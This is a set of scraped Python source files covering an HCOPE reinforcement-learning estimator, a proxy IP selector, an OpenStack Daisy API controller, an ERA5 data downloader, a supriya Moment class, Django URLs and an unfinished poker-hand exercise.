\n At each time-step it substracts shift from the reward.\n \"\"\"\n total_reward = 0.\n steps = 0\n\n if(rollout_length==None):\n rollout_length=self.rollout_length\n\n ob = self.env.reset()\n for i in range(rollout_length):\n action,prob = policy.act(ob)\n ob, reward, done, _ = self.env.step(action)\n steps += 1\n total_reward += (reward - shift)\n if(render):\n env.render()\n if done:\n break\n \n return total_reward, steps\n\n # Modified rollout method for HCOPE evaluation. Returns probs of each action that were taken in behavorial as well as evaluation policy\n def mod_rollout(self,shift = 0., rollout_length = None,render = False,random =False,greedy=True):\n \"\"\" \n Performs one rollout of maximum length rollout_length. \n At each time-step it substracts shift from the reward.\n \"\"\"\n \n\n total_reward = 0.\n steps = 0\n rewards = []\n probs = []\n eval_probs =[]\n if(rollout_length==None):\n rollout_length=self.rollout_length\n\n ob = self.env.reset()\n for i in range(rollout_length):\n if random== True:\n action = np.random.randint(0,env.action_space.n)\n action,prob = self.policy.act_action(ob,action)\n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n elif greedy==False:\n action,prob = self.policy.act(ob,greedy=greedy) \n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n \n else:\n action,prob = self.policy.act(ob)\n \n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n \n ob, reward, done, _ = self.env.step(action)\n rewards.append(reward- shift)\n probs.append(prob)\n eval_probs.append(eval_prob)\n steps += 1\n total_reward += (reward - shift)\n if(render):\n env.render()\n if done:\n break\n \n return total_reward, steps,rewards,probs,eval_probs\n\n\n # Evaluate any policy\n def evaluate(self,policy=None,shift=0.,n_rollouts=100,render = False):\n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n rewards = []\n for i in range(n_rollouts):\n total_reward,steps = self.rollout(render=render,shift =shift ,policy = policy)\n rewards.append(total_reward) \n\n rewards = np.asarray(rewards)\n rewards = self.normalize_reward(rewards,self.R_min,self.R_max)\n\n return(np.mean(rewards))\n\n\n # Method to normalize trajectory rewards\n def normalize_reward(self, rewards,R_minus,R_plus):\n return (rewards-R_minus)/(R_plus-R_minus)\n\n\n # Method to generate dataset if it is not provided\n def generate_dataset(self,dataset_size = 100,shift = 0.,render=False):\n # Stop updating filter \n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n self.eval_policy.update_weights(self.e_policy)\n self.eval_policy.update_filter = False\n rewards = []\n probs = []\n eval_probs = []\n\n\n for i in range(dataset_size):\n total_reward,steps,rewards_list,probs_list,eval_probs_list = self.mod_rollout(render=render,shift = shift,greedy=False)\n rewards.append(rewards_list)\n probs.append(probs_list)\n eval_probs.append(eval_probs_list) \n\n rewards = np.asarray(rewards)\n probs = np.asarray(probs)\n eval_probs = np.asarray(eval_probs)\n\n # Shuffle our dataset\n permutation = np.random.permutation(probs.shape[0])\n \n rewards = rewards[permutation,:]\n #rewards=self.normalize_reward(rewards,self.R_min,self.R_max)\n\n probs = probs[permutation,:]\n eval_probs =eval_probs[permutation,:]\n\n # Break the dataset into two parts for estimating c* \n d_pre = rewards[:int(0.05*dataset_size),:]\n d_post = rewards[int(0.05*dataset_size):,:]\n \n pi_b_pre = probs[:int(0.05*dataset_size),:]\n pi_b_post = 
probs[int(0.05*dataset_size):,:]\n\n pi_e_pre = eval_probs[:int(0.05*dataset_size),:]\n pi_e_post = eval_probs[int(0.05*dataset_size):,:]\n\n return [d_pre,d_post,pi_b_pre,pi_b_post,pi_e_pre,pi_e_post]\n\n\n \n def visualize_IS_distribution(self):\n episodes = 1000\n probs=[]\n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n self.eval_policy.update_weights(self.e_policy)\n self.eval_policy.update_filter = False\n\n eval_probs=[]\n for i in range(episodes):\n total_reward,steps,rewards_list,probs_list,eval_probs_list = self.mod_rollout(greedy=False)\n probs.append(probs_list)\n eval_probs.append(eval_probs_list) \n\n \n probs = np.asarray(probs)\n eval_probs = np.asarray(eval_probs)\n\n importance_weight = np.log(np.asarray([ np.prod(np.asarray(eval_probs[i])/np.asarray(probs[i])) for i in range(episodes)], dtype=float))\n plt.hist(importance_weight, color = 'blue', edgecolor = 'black',bins = int(100))\n\n plt.savefig(\"IS_dist.png\")\n \n\n\n def estimate_behavior_policy(self,dataset):\n d_pre,d_post,pi_b_pre,pi_b_post,pi_e_pre,pi_e_post = dataset\n eval_estimate = self.hcope_estimator(d_pre, d_post, pi_b_pre,pi_b_post,pi_e_pre,pi_e_post,self.delta)\n print(\"Estimate of evaluation policy: {}\".format(eval_estimate))\n\n \n def hcope_estimator(self,d_pre, d_post, pi_b_pre,pi_b_post,pi_e_pre,pi_e_post,delta):\n \"\"\"\n d_pre : float, size = (dataset_split,)\n Trajectory rewards from the behavior policy \n\n d_post : float, size = (dataset_size - dataset_split, )\n Trajectory rewards from the behavior policy \n\n delta : float, size = scalar\n 1-delta is the confidence of the estimator\n \n pi_b : Probabilities for respective trajectories in behaviour policy\n\n pi_e : Probabilities for respective trajectories in evaluation policy\n\n RETURNS: lower bound for the mean, mu as per Theorem 1 of Thomas et al. 
High Confidence Off-Policy Evaluation\n \"\"\"\n \n print(\"Running HCOPE estimator on the evaluation policy..........\")\n\n d_pre = np.asarray(d_pre)\n d_post = np.asarray(d_post)\n n_post = len(d_post)\n n_pre = len(d_pre)\n\n # Estimate c which maximizes the lower bound using estimates from d_pre\n\n c_estimate = 4.0\n print(\"Intial estimate of c {}.\".format(c_estimate))\n\n def f(x):\n n_pre = len(d_pre)\n Y = np.asarray([min(self.normalize_reward(np.sum(d_pre[i]),self.R_min,self.R_max) * np.prod(pi_e_pre[i]/pi_b_pre[i].astype(np.float64)), x) for i in range(n_pre)], dtype=float)\n importance_weights = np.asarray([ np.prod(pi_e_pre[i]/pi_b_pre[i].astype(np.float64)) for i in range(n_pre)], dtype=float)\n # Empirical mean\n EM = np.sum(Y)/n_pre\n #print(EM)\n # Second term\n term2 = (7.*x*np.log(2./delta)) / (3*(n_post-1))\n # print(term2)\n square_term = ((n_pre*np.sum(np.square(Y))) - np.square(np.sum(Y)))\n if square_term<0:\n square_term=0\n # Third term\n term3 = np.sqrt( (((2.*np.log(2./delta))/(n_post*n_pre*(n_pre-1))) * square_term ))\n # print(term3)\n return (-EM+term2+term3) \n\n c_estimate = minimize(f,np.array([c_estimate]),method='BFGS').x\n\n print(\"The estimate for c* was found to be {}.\".format(c_estimate))\n\n # Use the estimated c for computing the maximum lower bound\n c = c_estimate\n\n if ~isinstance(c, list):\n c = np.full((n_post,), c, dtype=float)\n\n \n \n if n_post<=1:\n raise(ValueError(\"The value of 'n' must be greater than 1\"))\n\n\n Y = np.asarray([min(self.normalize_reward(np.sum(d_post[i]),self.R_min,self.R_max) * np.prod(pi_e_post[i]/pi_b_post[i].astype(np.float64)), c[i]) for i in range(len(d_post))], dtype=float)\n importance_weights = np.asarray([ np.prod(pi_e_post[i]/pi_b_post[i].astype(np.float64)) for i in range(n_post)], dtype=float)\n \n # Empirical mean\n c = np.asarray([max(1,i) for i in c])\n\n EM = np.sum(Y/c[0])/(np.sum(1/c))\n\n # Second term\n term2 = (7.*n_post*np.log(2./delta)) / (3*(n_post-1)*np.sum(1/c))\n\n # Third term\n square_term = (n_post*np.sum(np.square(Y/c)) - np.square(np.sum(Y/c)))\n if square_term<0:\n square_term = 0\n term3 = np.sqrt( ((2*np.log(2./delta))/(n_post-1)) * square_term) / np.sum(1/c)\n\n\n # Sanity check on determinant\n\n k1 = (7.*n_post)/(3*(n_post-1)) \n k2 = (n_post*np.sum(np.square(Y/c)) - np.square(np.sum(Y/c)))*(2./(n_post-1))\n k3 = (EM - term2 - term3)*np.sum(1/c) - (np.sum(Y/c))\n\n if(k2-4*k1*k3<0):\n print(\"The estimate of u_ is of zero confidence\")\n else:\n if(-np.sqrt(k2)+np.sqrt(k2-4*k1*k3))<0:\n print(\"The estimate of u_ is of zero confidence\")\n\n # Final estimate\n return EM - term2 - term3\n\n\n\n\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n # Create a gym environment\n env_name = \"MountainCar-v0\"\n env = gym.make(env_name)\n\n # Assuming discrete action space\n action_size = env.action_space.n\n ob_size = env.observation_space.shape[0]\n\n # Create a bilayer mlp with softmax\n policy_params={'type':'bilayer',\n 'ob_filter':'MeanStdFilter',\n 'ob_dim':ob_size,\n 'ac_dim':action_size}\n policy = BilayerPolicy_softmax(policy_params)\n eval_policy = BilayerPolicy_softmax(policy_params)\n\n my_hcope = HCOPE(env,policy,eval_policy,rollout_length = 1000,delta =0.1)\n my_hcope.setup_e_policy()\n\n dataset = my_hcope.generate_dataset(dataset_size=100,shift=-2)\n print(\"Estimate of behavorial policy: {}\".format(my_hcope.evaluate(policy=my_hcope.policy,shift = -2,n_rollouts=100,render =False)))\n\n my_hcope.estimate_behavior_policy(dataset)\n print(\"True estimate of evaluation 
policy: {}\".format(my_hcope.evaluate(policy=my_hcope.eval_policy,shift = -2,n_rollouts=100,render =False)))\n\n #my_hcope.visualize_IS_distribution()","sub_path":"Safe-RL/safeRL/HCOPE/hcope.py","file_name":"hcope.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523528808","text":"\nimport IP_test\nimport random\nimport re\n\nIP = []\nPORT = []\nHTTP = []\nproxy = {}\n\ndef Finder():\n print(\"输入代理区域/IP/类型/匿名类型/端口\")\n while True:\n C = input(\"{Finder}[输入查找内容]{>>>}\")\n f = open('IP_NEW_pool.txt','r',encoding='utf-8')\n c = C.replace('[NEW]','')\n for x in f:\n if c in x:\n x = x.replace('\\n','')\n print(x)\n f.close()\ndef make1():\n C = input(\"{Finder}[输入IP区域]{>>>}\")\n f = open('IP_NEW_pool.txt','r',encoding='utf-8')\n c = C.replace('[NEW]','')\n for x in f:\n if c in x:\n x = x.replace('\\n','')\n print(x)\n IP1 = re.findall(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)',str(x))\n IP2 = re.findall(r'PORT:(.+?) 类',str(x))\n #IP:118.212.104.134 PORT:9999 类型:HTTP 位置:江西省新余市 联通 最后验证时间:2020-06-16 16:31:01\n IP3 = re.findall(r'类型:(.+?) 位',str(x))\n for y,z,a in zip(IP1,IP2,IP3):\n IP.append(y)\n PORT.append(z)\n HTTP.append(a)\n i = random.randint(1,len(IP))\n x = IP_test.IP[i]\n y = IP_test.PORT[i]\n z = IP_test.HTTP[i]\n proxy = {z:\"http://\"+x+\":\"+y}\n f.close()\ndef make():\n IP_test.get_IP()\n i = random.randint(1,len(IP_test.IP))\n x = IP_test.IP[i]\n y = IP_test.PORT[i]\n z = IP_test.HTTP[i]\n proxy = {z:\"http://\"+x+\":\"+y}\ndef make2(C):\n if C == None:\n C = input(\"{Finder}[输入IP的识别码{>>>}\")\n else:\n C = C\n f = open('IP_pool.txt','r',encoding='utf-8')\n for x in f:\n a = re.findall(r'\\[(\\d+?)\\]',x)\n for y in a:\n y = str(y)\n if str(C) in y:\n x = x.replace('\\n','')\n print(x)\n IP1 = re.findall(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)',str(x))\n IP2 = re.findall(r'PORT:(.+?)-',str(x))\n #IP:118.212.104.134 PORT:9999 类型:HTTP 位置:江西省新余市 联通 最后验证时间:2020-06-16 16:31:01\n IP3 = re.findall(r'\\[HTTP/HTTPS\\]:(.+?)}',str(x))\n for y,z,a in zip(IP1,IP2,IP3):\n IP.append(y)\n PORT.append(z)\n HTTP.append(a)\n x = IP[0]\n y = PORT[0]\n z = HTTP[0]\n proxy = {z:\"http://\"+x+\":\"+y}\n print(proxy)\n f.close()\ndef main():\n while True:\n i = input(\"{IP}{>>>}\")\n if i == \"/IP -get\":\n import IP_get\n IP_get.IP_get_main()\n elif i == \"/IP -test\":\n IP_test.IP_test_main()\n elif i == \"/IP -find\":\n Finder()\n elif i == '/stop':\n break\n","sub_path":"pycrawler/IP_run.py","file_name":"IP_run.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630671444","text":"# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\n/template_configs endpoint for Daisy v1 API\n\"\"\"\n\nfrom oslo_log import log as logging\nfrom webob.exc import HTTPBadRequest\nfrom webob.exc import HTTPForbidden\nfrom webob.exc import HTTPNotFound\nimport json\n\nfrom daisy.api import policy\nimport daisy.api.v1\nfrom daisy.api.v1 import controller\nfrom daisy.api.v1 import filters\nfrom daisy.common import exception\nfrom daisy.common import utils\nfrom daisy.common import wsgi\nfrom daisy import i18n\nfrom daisy import notifier\nimport daisy.registry.client.v1.api as registry\nimport daisy.api.backends.common as daisy_cmn\n\nLOG = logging.getLogger(__name__)\n_ = i18n._\n_LE = i18n._LE\n_LI = i18n._LI\n_LW = i18n._LW\nSUPPORTED_PARAMS = daisy.api.v1.SUPPORTED_PARAMS\nSUPPORTED_FILTERS = daisy.api.v1.SUPPORTED_FILTERS\nACTIVE_IMMUTABLE = daisy.api.v1.ACTIVE_IMMUTABLE\n\nCONFIG_ITEMS = ['name', 'config_file', 'service', 'section_name', 'data_type']\n\n\ndef check_template_config_format(template):\n def check_service_format(services):\n \"\"\"\n \"service\": {\n \"compute\": {\"force_type\": \"service\"},\n \"glance\": {\"force_type\": \"none\"}\n }\n \"\"\"\n for service_name, service_value in services.items():\n if service_name not in daisy_cmn.service_map.keys():\n raise HTTPBadRequest(\"service '%s' not in service table\" %\n service_name)\n if 'force_type' not in service_value \\\n or service_value['force_type'] not in ['service', 'node',\n 'none']:\n raise HTTPBadRequest(\"No force_type or error force_type value\"\n \" in service\")\n\n def check_data_type(config):\n if config['data_type'] not in ['int', 'string', 'list', 'boolean',\n 'float', 'ipaddr', 'password']:\n raise HTTPBadRequest(\"data_type '%s' in '%s' not support\" % (\n config['data_type'], config['name']))\n\n if not template:\n raise HTTPBadRequest('Template config is null!')\n\n for value in template.values():\n for item in CONFIG_ITEMS:\n if not value.get(item):\n raise HTTPBadRequest('No service or config file found in '\n 'template config!')\n check_data_type(value)\n check_service_format(value['service'])\n\n\nclass Controller(controller.BaseController):\n \"\"\"\n WSGI controller for template_configs resource in Daisy v1 API\n\n The template_configs resource API is a RESTful web service for\n template_config data.\n The API is as follows::\n\n GET /template_configs -- Returns a set of brief metadata about\n template_configs\n GET /template_configs/detail -- Returns a set of detailed metadata\n about emplate_configs\n HEAD /template_configs/ --\n Return metadata about an template_config with id \n GET /template_configs/ --\n Return template_config data for template_config with id \n POST /template_configs --\n Store template_config data and return metadata about the\n newly-stored template_config\n PUT /template_configs/ --\n Update template_config metadata and/or upload template_config\n data for a previously-reserved template_config\n DELETE /template_configs/ -- Delete the template_config with \n \"\"\"\n\n def __init__(self):\n self.notifier = notifier.Notifier()\n registry.configure_registry_client()\n self.policy = policy.Enforcer()\n\n def _enforce(self, req, action, target=None):\n \"\"\"Authorize an action against our policies\"\"\"\n if target is None:\n target = {}\n try:\n self.policy.enforce(req.context, action, target)\n except exception.Forbidden:\n raise HTTPForbidden()\n\n def _get_filters(self, req):\n \"\"\"\n Return a 
dictionary of query param filters from the request\n\n :param req: the Request object coming from the wsgi layer\n :retval a dict of key/value filters\n \"\"\"\n query_filters = {}\n for param in req.params:\n if param in SUPPORTED_FILTERS:\n query_filters[param] = req.params.get(param)\n if not filters.validate(param, query_filters[param]):\n raise HTTPBadRequest(_('Bad value passed to filter '\n '%(filter)s got %(val)s')\n % {'filter': param,\n 'val': query_filters[param]})\n return query_filters\n\n def _get_query_params(self, req):\n \"\"\"\n Extracts necessary query params from request.\n\n :param req: the WSGI Request object\n :retval dict of parameters that can be used by registry client\n \"\"\"\n params = {'filters': self._get_filters(req)}\n\n for PARAM in SUPPORTED_PARAMS:\n if PARAM in req.params:\n params[PARAM] = req.params.get(PARAM)\n return params\n\n def _raise_404_if_cluster_deleted(self, req, cluster_id):\n cluster = self.get_cluster_meta_or_404(req, cluster_id)\n if cluster['deleted']:\n msg = _(\"cluster with identifier %s has been deleted.\") % \\\n cluster_id\n raise HTTPNotFound(msg)\n\n @utils.mutating\n def get_template_config(self, req, id):\n \"\"\"\n Returns metadata about an template_config in the HTTP headers of the\n response object\n\n :param req: The WSGI/Webob Request object\n :param id: The opaque template_config identifier\n\n :raises HTTPNotFound if template_config metadata is not\n available to user\n \"\"\"\n self._enforce(req, 'get_template_config')\n template_config_meta = self.get_template_config_meta_or_404(req, id)\n return {'template_config_meta': template_config_meta}\n\n def list_template_config(self, req):\n \"\"\"\n Returns detailed information for all available template_configs\n\n :param req: The WSGI/Webob Request object\n :retval The response body is a mapping of the following form::\n\n {'template_configs': [\n {'id': ,\n 'name': ,\n 'description': ,\n 'created_at': ,\n 'updated_at': ,\n 'deleted_at': |,}, ...\n ]}\n \"\"\"\n self._enforce(req, 'list_template_config')\n params = self._get_query_params(req)\n try:\n template_configs = registry.list_template_config_metadata(\n req.context, **params)\n except exception.Invalid as e:\n raise HTTPBadRequest(explanation=e.msg, request=req)\n return dict(template_configs=template_configs)\n\n @utils.mutating\n def import_template_config(self, req, template_config_meta):\n self._enforce(req, 'import_template_config')\n try:\n template = json.loads(template_config_meta.get('template', None))\n except ValueError as e:\n LOG.error(e.message)\n raise HTTPBadRequest(explanation=e.message, request=req)\n check_template_config_format(template)\n template_config_meta = registry.import_template_config_metadata(\n req.context, template_config_meta)\n return {'template_config_meta': template_config_meta}\n\n\nclass TemplateConfigSetDeserializer(wsgi.JSONRequestDeserializer):\n \"\"\"Handles deserialization of specific controller method requests.\"\"\"\n\n def _deserialize(self, request):\n result = {}\n result[\"template_config_meta\"] = utils.get_dict_meta(request)\n return result\n\n def add_template_config(self, request):\n return self._deserialize(request)\n\n def update_template_config(self, request):\n return self._deserialize(request)\n\n def import_template_config(self, request):\n return self._deserialize(request)\n\n\nclass TemplateConfigSetSerializer(wsgi.JSONResponseSerializer):\n \"\"\"Handles serialization of specific controller method responses.\"\"\"\n\n def __init__(self):\n 
self.notifier = notifier.Notifier()\n\n def add_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def delete_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def get_template_config(self, response, result):\n template_config_meta = result['template_config_meta']\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(\n dict(template_config=template_config_meta))\n return response\n\n def import_template_config(self, response, result):\n response.status = 201\n response.headers['Content-Type'] = 'application/json'\n response.body = self.to_json(result)\n return response\n\n\ndef create_resource():\n \"\"\"template_configs resource factory method\"\"\"\n deserializer = TemplateConfigSetDeserializer()\n serializer = TemplateConfigSetSerializer()\n return wsgi.Resource(Controller(), deserializer, serializer)\n","sub_path":"code/daisy/daisy/api/v1/template_configs.py","file_name":"template_configs.py","file_ext":"py","file_size_in_byte":10481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49973535","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"Downloads ERA5 geopotential data via the ECMWF Web API and saves it to the location as specified in config.py.\n\nFirst `install CDS API key`_. The data used for this analysis is not listed in the CDS download data web form. ECMWF\nMARS keywords are used to request this data. For more information about the request parameters see the `ERA5 catalogue`_\nand the `ERA5 documentation`_. The ERA5 catalogue form shows the available data and generates Python code for executing\nthe data request.\n\nExample::\n\n $ python download_geopotential_data.py\n\n.. _install CDS API key:\n https://cds.climate.copernicus.eu/api-how-to\n.. _ERA5 catalogue:\n http://apps.ecmwf.int/data-catalogues/era5\n.. 
_ERA5 documentation:\n https://software.ecmwf.int/wiki/display/CKB/ERA5+data+documentation\n\n\"\"\"\n\nimport cdsapi\nimport os\n\nfrom config import area, grid, era5_data_dir, geopotential_file_name\n\n\ndef download_data():\n \"\"\"Construct request and download data to [output_dir]/era5_geopotential_data.netcdf.\n\n Args:\n data_request (dict): Data request property name and value pairs.\n\n \"\"\"\n client = cdsapi.Client() # Connect to server.\n\n # Default data request configuration - do not change.\n request_config = {\n \"class\": \"ea\",\n \"expver\": \"1\",\n \"stream\": \"oper\",\n \"type\": \"an\",\n \"levtype\": \"sfc\",\n \"param\": \"129.128\",\n \"date\": \"2018-01-01\",\n \"time\": \"00:00:00\",\n \"format\": \"netcdf\",\n }\n\n # Add the area to request_config.\n request_config['area'] = area\n\n # Add the grid to request_config.\n if grid == 'fine':\n request_config['grid'] = \"0.1/0.1\"\n elif grid == 'coarse':\n request_config['grid'] = \"0.25/0.25\"\n else:\n raise ValueError(\"Invalid grid parameter provided in config.py, opt between 'fine' or 'coarse'.\")\n\n if not os.path.isdir(era5_data_dir):\n raise ValueError(\"Data target directory as specified in config.py does not exist, change it to an existing\"\n \"directory.\")\n\n # Add the save file location to request_config.\n target_file = os.path.join(era5_data_dir, geopotential_file_name)\n\n if os.path.exists(target_file):\n raise ValueError(\"File ({}) already exists. To start the download, remove the file and try again.\"\n .format(target_file))\n else:\n print(\"Saving data in: \" + target_file)\n client.retrieve(\"reanalysis-era5-complete\", request_config, target_file)\n print(\"Download complete.\")\n\n\nif __name__ == '__main__':\n download_data()\n","sub_path":"download_geopotential_data.py","file_name":"download_geopotential_data.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478697611","text":"# -*- encoding: utf-8 -*-\nfrom supriya.tools.nonrealtimetools.SessionObject import SessionObject\n\n\nclass Moment(SessionObject):\n \"\"\"\n A moment-in-time referencing a singleton non-realtime state.\n\n ::\n\n >>> session = nonrealtimetools.Session()\n >>> moment = session.at(10.5)\n\n \"\"\"\n\n ### CLASS VARIABLES ###\n\n __documentation_section__ = 'Session Objects'\n\n __slots__ = (\n '_offset',\n '_propagate',\n '_session',\n '_state',\n )\n\n ### INITIALIZER ###\n\n def __init__(self, session, offset, state, propagate=True):\n SessionObject.__init__(self, session)\n self._offset = offset\n self._state = state\n self._propagate = bool(propagate)\n\n ### SPECIAL METHODS ###\n\n def __enter__(self):\n self.session.active_moments.append(self)\n if self.propagate:\n self.session._apply_transitions(self.state.offset)\n return self\n\n def __eq__(self, expr):\n if not isinstance(expr, type(self)):\n return False\n if expr.session is not self.session:\n return False\n return expr.offset == self.offset\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.session.active_moments.pop()\n if self.propagate:\n self.session._apply_transitions(self.state.offset)\n\n def __lt__(self, expr):\n if not isinstance(expr, type(self)) or expr.session is not self.session:\n raise ValueError(expr)\n return self.offset < expr.offset\n\n def __repr__(self):\n return '<{} @{!r}>'.format(\n type(self).__name__,\n self.offset,\n )\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def offset(self):\n return self._offset\n\n 
@property\n def propagate(self):\n return self._propagate\n\n @property\n def state(self):\n return self._state\n","sub_path":"supriya/tools/nonrealtimetools/Moment.py","file_name":"Moment.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"592037801","text":"#-*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import (\n patterns, url\n)\n\nfrom .views import (publish_article, list_articles, search_articles, upload_image)\n\n\nurlpatterns = patterns('articles.views',\n url(r'^list/?$', list_articles, name='list_articles'),\n url(r'^search/$', search_articles, name='search_articles'),\n url(r'^(?P.+)/publish/$', publish_article, name='publish_article'),\n url(r'^upload/image/$', upload_image, name='upload_image'),\n)\n","sub_path":"djangosrc/pysrc/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638888881","text":"'''\n8.9. Сообщения: создайте список с серией коротких сообщений. Передайте список\nфункции show_messages(), которая выводит текст каждого сообщения в списке\n'''\n\ndef show_messages(massages):\n\tfor massage in massages:\n\t\tprint(massage)\n\nmassages = ['Привет', 'Как дела?', 'Что делаешь?']\n\nshow_messages(massages)","sub_path":"book/8.9.py","file_name":"8.9.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354942626","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# -----------------\n# Реализуйте функцию best_hand, которая принимает на вход\n# покерную \"руку\" (hand) из 7ми карт и возвращает лучшую\n# (относительно значения, возвращаемого hand_rank)\n# \"руку\" из 5ти карт. У каждой карты есть масть(suit) и\n# ранг(rank)\n# Масти: трефы(clubs, C), пики(spades, S), червы(hearts, H), бубны(diamonds, D)\n# Ранги: 2, 3, 4, 5, 6, 7, 8, 9, 10 (ten, T), валет (jack, J), дама (queen, Q), король (king, K), туз (ace, A)\n# Например: AS - туз пик (ace of spades), TH - дестяка черв (ten of hearts), 3C - тройка треф (three of clubs)\n\n# Задание со *\n# Реализуйте функцию best_wild_hand, которая принимает на вход\n# покерную \"руку\" (hand) из 7ми карт и возвращает лучшую\n# (относительно значения, возвращаемого hand_rank)\n# \"руку\" из 5ти карт. Кроме прочего в данном варианте \"рука\"\n# может включать джокера. 
Джокеры могут заменить карту любой\n# масти и ранга того же цвета, в колоде два джокерва.\n# Черный джокер '?B' может быть использован в качестве треф\n# или пик любого ранга, красный джокер '?R' - в качестве черв и бубен\n# любого ранга.\n\n# Одна функция уже реализована, сигнатуры и описания других даны.\n# Вам наверняка пригодится itertoolsю\n# Можно свободно определять свои функции и т.п.\n# -----------------\n\nfrom itertools import groupby, combinations\n\n\ndef ll(iterable):\n return len(list(iterable))\n\n\ndef all_equals(iterable):\n return ll(groupby(iterable)) == 1\n\n\ndef hand_rank(hand):\n \"\"\"Возвращает значение определяющее ранг 'руки'\"\"\"\n ranks = card_ranks(hand)\n if straight(ranks) and flush(hand):\n return (8, max(ranks))\n elif kind(4, ranks):\n return (7, kind(4, ranks), kind(1, ranks))\n elif kind(3, ranks) and kind(2, ranks):\n return (6, kind(3, ranks), kind(2, ranks))\n elif flush(hand):\n return (5, ranks)\n elif straight(ranks):\n return (4, max(ranks))\n elif kind(3, ranks):\n return (3, kind(3, ranks), ranks)\n elif two_pair(ranks):\n return (2, two_pair(ranks), ranks)\n elif kind(2, ranks):\n return (1, kind(2, ranks), ranks)\n else:\n return (0, ranks)\n\n\ndef card_ranks(hand):\n \"\"\"Возвращает список рангов (его числовой эквивалент),\n отсортированный от большего к меньшему\"\"\"\n total = '23456789TJQKA'\n return sorted([total.index(x[0]) for x in hand], reverse=True)\n\n\ndef flush(hand):\n \"\"\"Возвращает True, если все карты одной масти\"\"\"\n groups = groupby(hand, lambda x: x[1])\n return ll(groups) == 1\n\n\ndef straight(ranks):\n \"\"\"Возвращает True, если отсортированные ранги формируют последовательность 5ти,\n где у 5ти карт ранги идут по порядку (стрит)\"\"\"\n total = '.'.join([str(x) for x in reversed(range(2, 15))])\n return '.'.join([str(x) for x in ranks]) in total\n\n\ndef kind(n, ranks):\n \"\"\"Возвращает первый ранг, который n раз встречается в данной руке.\n Возвращает None, если ничего не найдено\"\"\"\n for rank, group in groupby(ranks):\n if ll(group) == n:\n return rank\n\n\ndef two_pair(ranks):\n \"\"\"Если есть две пары, то возврщает два соответствующих ранга,\n иначе возвращает None\"\"\"\n grouped = groupby(ranks)\n filtered = [rk for rk, gp in grouped if len(list(gp)) == 2]\n result = filtered[:2] if len(filtered) > 1 else None\n return result\n\n\ndef is_better_rank(a, b):\n is_better = False\n for x, y in zip(a, b):\n if x == y:\n continue\n is_better = x > y\n return is_better\n\n\ndef best_hand(hand):\n \"\"\"Из \"руки\" в 7 карт возвращает лучшую \"руку\" в 5 карт \"\"\"\n bhand = hand[:5]\n brank = hand_rank(bhand)\n\n for cur_hand in combinations(hand, 5):\n cur_rank = hand_rank(cur_hand)\n if is_better_rank(cur_rank, brank):\n brank = cur_rank\n bhand = cur_hand\n\n return bhand\n\n\ndef color(kind):\n if kind == 'C' or kind == 'S':\n return 'B'\n return 'R'\n\n\ndef wild_street(hand):\n pass\n\n\ndef wild_n(n, ranks, j_count):\n n = n - j_count\n for rank, group in groupby(ranks):\n if ll(group) >= n:\n return rank\n\n\ndef wild_flush(hand, jokers):\n groups = groupby(hand, lambda x: x[1])\n return ll(groups) == 1 and len(jokers) == 1 and color(hand[0][1]) == jokers[0][1]\n\n\ndef wild_full_house(ranks, hand, jokers):\n if len(jokers) == 2:\n kind(3,)\n\ndef best_wild_hand_one_joker(hand, j_color):\n bhand = None\n brank = None\n\n\n\n return None, None\n\n\ndef best_wild_hand_two_joker(hand):\n return None, None\n\n\ndef best_wild_hand(start_hand):\n jokers = [x for x in start_hand if '?' 
